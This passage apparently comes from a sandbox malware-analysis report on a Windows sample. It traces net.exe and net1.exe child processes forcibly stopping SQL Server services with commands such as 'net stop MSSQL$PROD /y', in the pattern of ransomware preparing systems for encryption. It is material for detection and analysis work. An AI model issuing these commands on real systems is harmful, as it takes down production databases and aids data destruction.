0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 13301 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 13302 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 13303 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 13304 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 13305 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 13306 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 13307 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 13308 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 13309 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 13310 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 13318 start_va = 0x75280000 end_va = 0x75281fff entry_point = 0x75280000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 928 os_tid = 0xe08 [0121.646] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xcfe50 | out: lpSystemTimeAsFileTime=0xcfe50*(dwLowDateTime=0xfda05df0, dwHighDateTime=0x1d48689)) [0121.646] GetCurrentProcessId () returned 0x1180 [0121.646] GetCurrentThreadId () returned 0xe08 [0121.646] GetTickCount () returned 0x280c3 [0121.646] QueryPerformanceCounter (in: lpPerformanceCount=0xcfe58 | out: lpPerformanceCount=0xcfe58*=1816856400000) returned 1 [0121.647] GetModuleHandleW (lpModuleName=0x0) returned 0xffa30000 [0121.647] __set_app_type (_Type=0x1) [0121.647] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xffa49c9c) returned 0x0 [0121.647] __getmainargs (in: _Argc=0xffa54780, _Argv=0xffa54790, _Env=0xffa54788, _DoWildCard=0, _StartInfo=0xffa5479c | out: _Argc=0xffa54780, _Argv=0xffa54790, _Env=0xffa54788) returned 0 [0121.647] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0121.647] GetConsoleOutputCP () returned 0x1b5 [0121.661] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xffa5cec0 | out: lpCPInfo=0xffa5cec0) returned 1 [0121.661] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0121.663] sprintf_s (in: _DstBuf=0xcfdf8, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0121.663] setlocale (category=0, locale=".437") returned="English_United States.437" [0121.664] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0121.664] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0121.664] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQL$PROD /y" [0121.665] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xcfb90, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0121.665] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0121.665] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0xcfde8 | out: Buffer=0xcfde8*=0x154d50) returned 0x0 [0121.665] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0xcfde8 | out: Buffer=0xcfde8*=0x15c0f0) returned 0x0 [0121.665] _fileno (_File=0x7fefdba2a80) returned 0 [0121.665] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0121.665] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0121.665] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0121.665] _wcsicmp (_String1="config", _String2="stop") returned -16 [0121.665] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0121.665] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0121.665] _wcsicmp (_String1="file", _String2="stop") returned -13 [0121.665] _wcsicmp (_String1="files", _String2="stop") returned -13 [0121.665] _wcsicmp (_String1="group", _String2="stop") returned -12 [0121.665] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0121.665] _wcsicmp (_String1="help", _String2="stop") returned -11 [0121.665] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0121.665] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0121.665] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0121.665] _wcsicmp (_String1="session", _String2="stop") returned -15 [0121.665] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0121.665] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0121.665] _wcsicmp (_String1="share", _String2="stop") returned -12 [0121.665] _wcsicmp (_String1="start", _String2="stop") returned -14 [0121.666] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0121.666] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0121.666] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0121.666] _wcsicmp (_String1="accounts", _String2="MSSQL$PROD") returned -12 [0121.666] _wcsicmp (_String1="computer", _String2="MSSQL$PROD") returned -10 [0121.666] _wcsicmp (_String1="config", _String2="MSSQL$PROD") returned -10 [0121.666] _wcsicmp (_String1="continue", _String2="MSSQL$PROD") returned -10 [0121.666] _wcsicmp (_String1="cont", _String2="MSSQL$PROD") returned -10 [0121.666] _wcsicmp (_String1="file", _String2="MSSQL$PROD") returned -7 [0121.666] _wcsicmp (_String1="files", _String2="MSSQL$PROD") returned -7 [0121.666] _wcsicmp (_String1="group", _String2="MSSQL$PROD") returned -6 [0121.666] _wcsicmp (_String1="groups", _String2="MSSQL$PROD") returned -6 [0121.666] _wcsicmp (_String1="help", _String2="MSSQL$PROD") returned -5 [0121.666] _wcsicmp (_String1="helpmsg", _String2="MSSQL$PROD") returned -5 [0121.666] _wcsicmp (_String1="localgroup", _String2="MSSQL$PROD") returned -1 [0121.666] _wcsicmp (_String1="pause", _String2="MSSQL$PROD") returned 3 [0121.666] _wcsicmp (_String1="session", _String2="MSSQL$PROD") returned 6 [0121.666] _wcsicmp (_String1="sessions", _String2="MSSQL$PROD") returned 6 [0121.666] _wcsicmp (_String1="sess", _String2="MSSQL$PROD") returned 6 [0121.666] _wcsicmp (_String1="share", _String2="MSSQL$PROD") returned 6 [0121.666] _wcsicmp (_String1="start", _String2="MSSQL$PROD") returned 6 [0121.666] _wcsicmp (_String1="stats", _String2="MSSQL$PROD") returned 6 [0121.666] _wcsicmp (_String1="statistics", _String2="MSSQL$PROD") returned 6 [0121.666] _wcsicmp (_String1="stop", _String2="MSSQL$PROD") returned 6 [0121.666] _wcsicmp (_String1="time", _String2="MSSQL$PROD") returned 7 [0121.666] _wcsicmp (_String1="user", _String2="MSSQL$PROD") returned 8 [0121.666] _wcsicmp (_String1="users", _String2="MSSQL$PROD") returned 8 [0121.666] _wcsicmp (_String1="msg", _String2="MSSQL$PROD") returned -12 [0121.666] _wcsicmp (_String1="messenger", _String2="MSSQL$PROD") returned -14 [0121.666] _wcsicmp (_String1="receiver", _String2="MSSQL$PROD") returned 5 [0121.666] _wcsicmp (_String1="rcv", _String2="MSSQL$PROD") returned 5 [0121.666] _wcsicmp (_String1="netpopup", _String2="MSSQL$PROD") returned 1 [0121.666] _wcsicmp (_String1="redirector", _String2="MSSQL$PROD") returned 5 [0121.666] _wcsicmp (_String1="redir", _String2="MSSQL$PROD") returned 5 [0121.666] _wcsicmp (_String1="rdr", _String2="MSSQL$PROD") returned 5 [0121.666] _wcsicmp (_String1="workstation", _String2="MSSQL$PROD") returned 10 [0121.666] _wcsicmp (_String1="work", _String2="MSSQL$PROD") returned 10 [0121.666] _wcsicmp (_String1="wksta", _String2="MSSQL$PROD") returned 10 [0121.666] _wcsicmp (_String1="prdr", _String2="MSSQL$PROD") returned 3 [0121.666] _wcsicmp (_String1="devrdr", _String2="MSSQL$PROD") returned -9 [0121.666] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQL$PROD") returned -1 [0121.666] _wcsicmp (_String1="server", _String2="MSSQL$PROD") returned 6 [0121.667] _wcsicmp (_String1="svr", _String2="MSSQL$PROD") returned 6 [0121.667] _wcsicmp (_String1="srv", _String2="MSSQL$PROD") returned 6 [0121.667] _wcsicmp (_String1="lanmanserver", _String2="MSSQL$PROD") returned -1 [0121.667] _wcsicmp (_String1="alerter", _String2="MSSQL$PROD") returned -12 [0121.667] _wcsicmp (_String1="netlogon", _String2="MSSQL$PROD") returned 1 [0121.667] _wcsupr (in: _String="MSSQL$PROD" | out: _String="MSSQL$PROD") returned="MSSQL$PROD" [0121.667] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x15ce00 [0121.671] GetServiceKeyNameW (in: hSCManager=0x15ce00, lpDisplayName="MSSQL$PROD", lpServiceName=0xffa55750, lpcchBuffer=0xcfd08 | out: lpServiceName="", lpcchBuffer=0xcfd08) returned 0 [0121.672] _wcsicmp (_String1="msg", _String2="MSSQL$PROD") returned -12 [0121.672] _wcsicmp (_String1="messenger", _String2="MSSQL$PROD") returned -14 [0121.672] _wcsicmp (_String1="receiver", _String2="MSSQL$PROD") returned 5 [0121.672] _wcsicmp (_String1="rcv", _String2="MSSQL$PROD") returned 5 [0121.672] _wcsicmp (_String1="redirector", _String2="MSSQL$PROD") returned 5 [0121.672] _wcsicmp (_String1="redir", _String2="MSSQL$PROD") returned 5 [0121.672] _wcsicmp (_String1="rdr", _String2="MSSQL$PROD") returned 5 [0121.672] _wcsicmp (_String1="workstation", _String2="MSSQL$PROD") returned 10 [0121.672] _wcsicmp (_String1="work", _String2="MSSQL$PROD") returned 10 [0121.672] _wcsicmp (_String1="wksta", _String2="MSSQL$PROD") returned 10 [0121.672] _wcsicmp (_String1="prdr", _String2="MSSQL$PROD") returned 3 [0121.672] _wcsicmp (_String1="devrdr", _String2="MSSQL$PROD") returned -9 [0121.672] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQL$PROD") returned -1 [0121.672] _wcsicmp (_String1="server", _String2="MSSQL$PROD") returned 6 [0121.672] _wcsicmp (_String1="svr", _String2="MSSQL$PROD") returned 6 [0121.672] _wcsicmp (_String1="srv", _String2="MSSQL$PROD") returned 6 [0121.672] _wcsicmp (_String1="lanmanserver", _String2="MSSQL$PROD") returned -1 [0121.672] _wcsicmp (_String1="alerter", _String2="MSSQL$PROD") returned -12 [0121.672] _wcsicmp (_String1="netlogon", _String2="MSSQL$PROD") returned 1 [0121.672] NetServiceControl (in: servername=0x0, service="MSSQL$PROD", opcode=0x0, arg=0x0, bufptr=0xcfd10 | out: bufptr=0xcfd10) returned 0x889 [0121.673] wcscpy_s (in: _Destination=0xffa580d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0121.673] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75280000 [0121.674] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75280000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xffa55b50, nSize=0x800, Arguments=0xffa57f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0121.676] GetFileType (hFile=0xb) returned 0x2 [0121.677] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xcfbd8 | out: lpMode=0xcfbd8) returned 1 [0121.677] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffa55b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0xcfbd0, lpReserved=0x0 | out: lpBuffer=0xffa55b50*, lpNumberOfCharsWritten=0xcfbd0*=0x1e) returned 1 [0121.677] GetFileType (hFile=0xb) returned 0x2 [0121.677] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xcfbd8 | out: lpMode=0xcfbd8) returned 1 [0121.678] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffa31efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xcfbd0, lpReserved=0x0 | out: lpBuffer=0xffa31efc*, lpNumberOfCharsWritten=0xcfbd0*=0x2) returned 1 [0121.678] _ultow (in: _Dest=0x889, _Radix=851008 | out: _Dest=0x889) returned="2185" [0121.678] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75280000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xffa55b50, nSize=0x800, Arguments=0xffa57f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0121.678] GetFileType (hFile=0xb) returned 0x2 [0121.678] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xcfbd8 | out: lpMode=0xcfbd8) returned 1 [0121.679] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffa55b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0xcfbd0, lpReserved=0x0 | out: lpBuffer=0xffa55b50*, lpNumberOfCharsWritten=0xcfbd0*=0x34) returned 1 [0121.679] GetFileType (hFile=0xb) returned 0x2 [0121.679] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xcfbd8 | out: lpMode=0xcfbd8) returned 1 [0121.679] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffa31efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xcfbd0, lpReserved=0x0 | out: lpBuffer=0xffa31efc*, lpNumberOfCharsWritten=0xcfbd0*=0x2) returned 1 [0121.680] NetApiBufferFree (Buffer=0x154d50) returned 0x0 [0121.680] NetApiBufferFree (Buffer=0x15c0f0) returned 0x0 [0121.680] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQL$PROD /y" [0121.680] exit (_Code=2) Process: id = "381" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x1ac69000" os_pid = "0xea0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop msftesql$PROD /y " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 13280 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 13281 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 13282 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 13283 start_va = 0x70000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 13284 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 13285 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 13286 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 13287 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 13288 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 13289 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 13290 start_va = 0x7fffffd7000 end_va = 0x7fffffd7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 13291 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 13311 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 13312 start_va = 0xf0000 end_va = 0x156fff entry_point = 0xf0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 13313 start_va = 0x2a0000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 13314 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 13315 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 13316 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 13317 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 929 os_tid = 0xe20 Process: id = "382" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x21eac000" os_pid = "0xcf8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "377" os_parent_pid = "0xda0" cmd_line = "C:\\Windows\\system32\\net1 stop MSSQLServerADHelper /y " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 13335 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 13336 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 13337 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 13338 start_va = 0x130000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 13339 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 13340 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 13341 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 13342 start_va = 0xffb10000 end_va = 0xffb42fff entry_point = 0xffb10000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 13343 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 13344 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 13345 start_va = 0x7fffffd9000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 13346 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 13347 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 13348 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 13349 start_va = 0x330000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 13350 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 13351 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 13352 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 13353 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 13373 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 13374 start_va = 0x290000 end_va = 0x29ffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 13375 start_va = 0x430000 end_va = 0x52ffff entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 13376 start_va = 0x7fef4380000 end_va = 0x7fef4391fff entry_point = 0x7fef4380000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 13377 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 13378 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 13379 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 13380 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 13381 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 13382 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 13383 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 13384 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 13385 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 13386 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 13387 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 13388 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 13389 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 13390 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 13391 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 13392 start_va = 0x75290000 end_va = 0x75291fff entry_point = 0x75290000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 931 os_tid = 0xcb4 [0122.122] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1af830 | out: lpSystemTimeAsFileTime=0x1af830*(dwLowDateTime=0xfdea2890, dwHighDateTime=0x1d48689)) [0122.122] GetCurrentProcessId () returned 0xcf8 [0122.122] GetCurrentThreadId () returned 0xcb4 [0122.122] GetTickCount () returned 0x282a6 [0122.122] QueryPerformanceCounter (in: lpPerformanceCount=0x1af838 | out: lpPerformanceCount=0x1af838*=1816904000000) returned 1 [0122.123] GetModuleHandleW (lpModuleName=0x0) returned 0xffb10000 [0122.123] __set_app_type (_Type=0x1) [0122.123] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xffb29c9c) returned 0x0 [0122.124] __getmainargs (in: _Argc=0xffb34780, _Argv=0xffb34790, _Env=0xffb34788, _DoWildCard=0, _StartInfo=0xffb3479c | out: _Argc=0xffb34780, _Argv=0xffb34790, _Env=0xffb34788) returned 0 [0122.124] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0122.124] GetConsoleOutputCP () returned 0x1b5 [0122.124] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xffb3cec0 | out: lpCPInfo=0xffb3cec0) returned 1 [0122.124] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0122.126] sprintf_s (in: 